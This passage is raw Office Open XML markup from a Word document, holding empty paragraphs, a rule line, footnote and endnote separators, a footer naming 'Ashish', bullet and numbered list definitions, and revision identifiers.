    <w:p w14:paraId="0F18471E" w14:textId="77777777" w:rsidR="003715CC" w:rsidRDefault="003715CC" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E4046D8" w14:textId="526C3755" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>_____________________________________________________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10069979" w14:textId="77777777" w:rsidR="004A2581" w:rsidRPr="00A7675D" w:rsidRDefault="004A2581" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="004A2581" w:rsidRPr="00A7675D">
      <w:headerReference w:type="default" r:id="rId25"/>
      <w:footerReference w:type="default" r:id="rId2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A9B80" w14:textId="77777777" w:rsidR="00440FC4" w:rsidRDefault="00440FC4" w:rsidP="003C1D22">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="02C08BE5" w14:textId="77777777" w:rsidR="00440FC4" w:rsidRDefault="00440FC4"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2745D652" w:rsidR="003C1D22" w:rsidRPr="003C1D22" w:rsidRDefault="00CB052D">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:lang w:val="en-CA"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:lang w:val="en-CA"/>
      </w:rPr>
      <w:t>Ashish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58999" w14:textId="77777777" w:rsidR="00440FC4" w:rsidRDefault="00440FC4" w:rsidP="003C1D22">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="465351E0" w14:textId="77777777" w:rsidR="00440FC4" w:rsidRDefault="00440FC4"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51202"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="44049FC6"/>
    <w:lvl w:ilvl="0" w:tplc="15C6CD5E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1E9CAD44">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B9964522">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7E0883A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="93907560">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="610EAF24">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="658059E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="537C19EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="FAF4268A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1E4183B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="040A722C"/>
    <w:lvl w:ilvl="0" w:tplc="9E72E1F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="69AED946">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D264D0C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9ABE08D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="5C5CBAB8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C64E1086">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="2E9EAF7C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B986D4A8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E0E65382">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1E496C51"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C09A6014"/>
    <w:lvl w:ilvl="0" w:tplc="4D3A158E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2BC44E96">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="597A2024">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8258EBDA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C212D8B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="AD32C648">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5FBC1EA6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3EFE078A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="BBDA3DC0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3"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DD5B29"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F46A1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4BF851"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7D2A47A"/>
    <w:lvl w:ilvl="0" w:tplc="65F6F86E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="16DA2F20">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3232EFE2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="77FA0D42">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E49E38E4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="DCCC30A0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="EE70D4E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7256B9C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="96D4BA98">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="51CD37B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78FCDC8A"/>
    <w:lvl w:ilvl="0" w:tplc="519EA1E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C01CA372">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B66AB56E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B41E6AE2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E56E5046">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="208E3728">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5EB6C384">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0FD245BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="DB9C7758">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="61CB7E46"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="443AB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03F34F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="670A711E"/>
    <w:lvl w:ilvl="0" w:tplc="FBA0F2F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="F1CE0F96">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="74B8355C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5396026E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B6849CFA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CA407136">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A4FE2B0A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="8582316E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="BBA069FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1317954275">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="659428319">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1133979975">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1875537800">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="564412484">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="850485199">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2006393143">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1519662352">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1346057132">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="11462409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02453"/>
    <w:rsid w:val="000118F8"/>
    <w:rsid w:val="00024F17"/>
    <w:rsid w:val="00033640"/>
    <w:rsid w:val="00033FCC"/>
    <w:rsid w:val="0005062F"/>
    <w:rsid w:val="00061196"/>
    <w:rsid w:val="000678C3"/>
    <w:rsid w:val="00093F7B"/>
    <w:rsid w:val="000D2815"/>
    <w:rsid w:val="00121486"/>
    <w:rsid w:val="00123DCA"/>
    <w:rsid w:val="001315D7"/>
    <w:rsid w:val="001334A6"/>
    <w:rsid w:val="001435BC"/>
    <w:rsid w:val="00163836"/>
    <w:rsid w:val="001D2509"/>
    <w:rsid w:val="001F288C"/>
    <w:rsid w:val="001F4D68"/>
    <w:rsid w:val="001F5071"/>
    <w:rsid w:val="00236359"/>
    <w:rsid w:val="00293318"/>
    <w:rsid w:val="002F632A"/>
    <w:rsid w:val="00317BD5"/>
    <w:rsid w:val="003344AB"/>
    <w:rsid w:val="00354FDA"/>
    <w:rsid w:val="003715CC"/>
    <w:rsid w:val="003C1D22"/>
    <w:rsid w:val="003F5B99"/>
    <w:rsid w:val="004165A5"/>
    <w:rsid w:val="00440FC4"/>
    <w:rsid w:val="004452AF"/>
    <w:rsid w:val="00457C4F"/>
    <w:rsid w:val="00497A8C"/>
    <w:rsid w:val="004A2581"/>
    <w:rsid w:val="004D4858"/>
    <w:rsid w:val="00500E6F"/>
    <w:rsid w:val="00510D8F"/>
    <w:rsid w:val="00513E5F"/>
    <w:rsid w:val="0051736D"/>
    <w:rsid w:val="00542F3A"/>
    <w:rsid w:val="00584B92"/>
    <w:rsid w:val="005A5CEF"/>
    <w:rsid w:val="005B29FC"/>
    <w:rsid w:val="005E1560"/>
    <w:rsid w:val="00603428"/>
    <w:rsid w:val="006253D6"/>
    <w:rsid w:val="00626011"/>
    <w:rsid w:val="0063180D"/>
    <w:rsid w:val="006614E2"/>
    <w:rsid w:val="006626E8"/>
    <w:rsid w:val="00687191"/>
    <w:rsid w:val="006A5F39"/>
    <w:rsid w:val="006B4DC5"/>
    <w:rsid w:val="006C3589"/>
    <w:rsid w:val="0070336B"/>
    <w:rsid w:val="0071459E"/>
    <w:rsid w:val="0071773C"/>
    <w:rsid w:val="007221D3"/>
    <w:rsid w:val="00725C99"/>
    <w:rsid w:val="007356F4"/>
    <w:rsid w:val="00751876"/>
    <w:rsid w:val="00774C80"/>
    <w:rsid w:val="00782E20"/>
    <w:rsid w:val="007A3BB1"/>
    <w:rsid w:val="007F46E4"/>
    <w:rsid w:val="008526F6"/>
    <w:rsid w:val="008633A6"/>
    <w:rsid w:val="008739B2"/>
    <w:rsid w:val="008D4BB2"/>
    <w:rsid w:val="008E2367"/>
    <w:rsid w:val="00907D4A"/>
    <w:rsid w:val="00914862"/>
    <w:rsid w:val="00930EBB"/>
    <w:rsid w:val="00967ADE"/>
    <w:rsid w:val="009B00E5"/>
    <w:rsid w:val="009D41A8"/>
    <w:rsid w:val="00A22945"/>
    <w:rsid w:val="00A2771F"/>
    <w:rsid w:val="00A343C2"/>
    <w:rsid w:val="00A504C3"/>
    <w:rsid w:val="00A56A4D"/>
    <w:rsid w:val="00A7675D"/>
    <w:rsid w:val="00AC6085"/>
    <w:rsid w:val="00AF5827"/>
